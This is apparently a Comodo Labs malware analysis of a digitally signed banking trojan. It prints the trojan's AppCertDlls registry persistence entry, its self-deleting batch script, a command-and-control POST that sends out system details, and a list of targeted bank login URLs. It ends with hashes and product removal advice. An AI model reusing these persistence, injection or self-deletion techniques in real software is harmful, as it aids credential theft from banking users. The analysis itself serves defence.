Reading Time: 5 minutes

As part of Comodo Labs’ ongoing analysis of “Digital Signature” (confirming software author and guaranteeing computer program code hasn’t been altered or corrupted since being signed) ”malware” (software used or created to disrupt computer operation, gather sensitive information, or gain access to computer systems), we recently discovered a new sample which uses an interesting and potentially devastating combination of techniques to deliver its “payload” (cargo of a data transmission).

Starting with a digitally signed “dropper” (installation program), the malware was able to successfully inject itself into Windows “processes” (instances of computer programs being executed); bypass “firewall” (protects against threats from the public Internet) and “host intrusion protection mechanisms” (monitor a single computer for suspicious activity by analyzing events occurring within that computer); send user details to a control “server” (computer hardware dedicated to run one or more services); download additional “configuration files” (configure initial settings for some computer programs) and finally to direct its victims to “phishing” websites (designed to look like other websites in an attempt to steal users’ personal information) which request the user’s banking usernames/passwords. This document contains a detailed description of our observations.

The dropper (installer) component of the malware was digitally signed by a trusted Certificate Authority. Because the installer was ‘trusted’, it was then able to evade detection by the heuristic and Host Intrusion Protection Systems (HIPSs) of many popular best antivirus and Internet Security programs.

Digital Signature

Upon execution, the dropper first determines the architecture of the Windows operating system (32-bit or 64-bit) then extracts the appropriate main module from “PE” (Portable Executable) file resources.

DLL

The file name of this main module is generated by concatenating two named fragments from two random “*.exe” (Windows Executable) files in the Windows system folder. For example “diskpart.exe” (Windows text-mode command interpreter) and “eventvwr.exe” (Microsoft Event Viewer) generates the file name “disktvwr.dll”.

The main module is the PE “DLL” (Dynamic Link Library of functions and other information that can be accessed by a Windows program) which is placed in the Windows system folder under this generated name. It is then injected into the operating system process “explorer.exe” (Windows Explorer).

DLL
Dynamic Link Library

It is configured for automatic injection into most operating system processes and user applications via a randomly named value of an obscure Windows Registry key (similar to a folder):

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls]
"ddeskeys"="C:\\Windows\\system32\\disktvwr.dll"

 

As a result, the function “CreateProcessNotify”, exported by the malware “module” (portion of the program that carries out a specific function and may be used alone or combined with other modules of the same program), is requested at the creation of each new process. This causes the malware DLL to be injected in most operating system processes and user applications.

After this operation, the dropper removes itself via the execution of a simple “DOS” (Disk Operating System) “BAT” (batch) script file:

Dynamic Link Library
1342562.bat:
attrib -s -r -h%1
:hkiflg
del %1
if exist %1 goto hkiflg
del %0

 

The main module is injected into the “explorer.exe” process and acts as a server application. It opens a “pipe” (named temporary software connection between two programs or commands) as a 128-bit Unique ID (UID), for example “\\\\.\\pipe\\{b2459e76-035d-2d18-0a97-debbcce1c0a5}”, and waits for incoming messages. Modules injected into other system processes and user applications act as “clients” (applications or systems that access a service made available by a server) and communicate with the server via the named pipe.

Posts 5
Hexa DLL

Modules injected into “iexplore.exe” (Microsoft Internet Explorer) and “firefox.exe” (Mozilla Firefox) web browser applications are used for communication with the remote control server. This tricks any firewall and HIPS technology by making network activity generated by the malware appear to have been initiated by the user. The current version of the malware does not support other browsers like “chrome.exe” (Google Chrome), “opera.exe” (Opera), and “safari.exe” (Apple Safari). To circumnavigate this issue, it prevents these browsers from opening and forces the user to use one of the supported browsers instead. The malware communicates with its remote control server by imitating access to a forum topic. Initially it sends an “HTTP” (Hypertext Transfer Protocol) “POST” (request method to request that the web server accepts the data enclosed in the request message’s body) for storage using a “URL” (Uniform Resource Locator global address of a web page on the World Wide Web) of following format:

http://*.*.*.*/viewtopic.php?f=159&t=17216&sid5=c0dcd0254daef45e27b86c3b5995a14c

 

…with the request body containing basic information about the user’s system and the installed malware module:

“user_id=1110380395&version_id=42&socks=0&build=32940&crc=50838475&
win=Microsoft+Windows+XP+Professional+Service+Pack+3+(build:+2600)&arch=x86+32bit&user=Admin”

 

It will then receive an updated configuration file from the remote server. The malware stores the configuration and version information in a Windows Registry key named using a 128-bit UID in a similar way that has been used for the named pipe:

[HKEY_CURRENT_USER\Software\AppDataLow\{21414dba-01d1-50fc-8e2b-a28ff0952499}]
"k1"=dword:b12564d0
"k2"=dword:473d87bb
"Version"=dword:0000002a
"Data"=hex:ca,2b,09,00,1b,e1,80,02,41,4c,3a,45,42,43,61,5f,09,31,39,36,cd,2f,\
...

 

The primary purpose of this malware is to steal personal information such as bank information or credit card accounts. This is a list of URLs monitored by the malware according to a recent configuration file:

bankofamerica.com/accounts-overview/accounts-overview.go
bankofamerica.com/login/sign-in/signOnScreen.go
bankofamerica.com/login/sign-in/validatePassword.go
bankofamerica.com/myaccounts/
barclaycardus.com/app/ccsite/logon/loginUserDyn.jsp
billmelater.com/login/challenge.xhtml
billmelater.com/your-account/home.xhtml
bofa.com
chaseonline.chase.com/gw/secure/ena
chaseonline.chase.com/MyAccounts.aspx
chaseonline.chase.com/secure/Profile/UpdateContactInfo/UpdateContact.aspx
client.schwab.com/Accounts/
client.schwab.com/Accounts/Summary/Summary.aspx
client.schwab.com/Service/MyProfile/MailingAddress.aspx
consumercenter.gogecapital.com/consumercenter/homeaction.do
discovercard.com/cardmembersvcs/achome/homepage
mbwebexpress.blilk.com/Core/Authentication/MFAPassword.aspx
mfasa.chase.com/auth/auth-stoken-osl.html
online.americanexpress.com/myca/acctmgmt/
online.citibank.com
online.wellsfargo.com/das/cgi-bin/session.cgi
onlinebanking.pnc.com/
onlinebanking.tdbank.com/login.asp
paypal.com/us/cgi-bin/webscr?cmd=_account
paypal.com/us/cgi-bin/webscr?cmd=_login-done
safe.bankofamerica.com/myaccounts/accounts-overview/accounts-overview.go
safe.bankofamerica.com/myaccounts/brain/redirect.go
safe.bankofamerica.com/myaccounts/signin/signIn.go?isSecureMobil
servicing.capitalone.com/C1/Accounts/Summary.aspx
shop.aafes.com/shop/Login.aspx
shopmyexchange.com
sitekey.bankofamerica.com/sas/signon.do
sitekey.bankofamerica.com/sas/signonSetup.do
sitekey.bankofamerica.com/sas/verifyImage.do
ss2.experian.com/securecontrol/reset/ssphome
suntrust.com/portal/server.pt
us.etrade.com/e/t/accounts/accountsCombo
us.hsbc.com/1/2/!ut/
wwws.ameritrade.com/cgi-bin/apps/SecurityChallenge

 

Once a user accesses one of the monitored URLs, the malware generates a phishing page which asks the user to enter their account details (including user-name, password and credit card number) under the pretense of either recovering their account password or to enable additional security measures:

Security System

File information:

Dropper EXE:
Size: 285264
SHA-1: b9f07c2eec5277bfc91d4bb9b8bac4e8d4cc8632
Signature: TrojWare.Win32.TrojanSpy.Volisk.a

x86 DLL:
Size: 88576
SHA-1: ba7f13855e7ad9c32917188281c4420cef8a830e
Signature: TrojWare.Win32.TrojanSpy.Volisk.a

x64 DLL:
Size: 98304
SHA-1: 372c2eafd39b317e6a94e84d673d394b2afd4b3f
Signature: TrojWare.Win32.TrojanSpy.Volisk.a

 

Diagnosis, Removal & Protection Instructions

If your computer doesn’t have an Antivirus or Internet Security program installed and you believe it may have been infected by “malware” (malicious software):

1. Download Comodo Antivirus and perform a full scan with up-to-date antivirus database.
2. Remove Malware Found by choosing from recommended options and stay protected.

START FREE TRIAL GET YOUR INSTANT SECURITY SCORECARD FOR FREE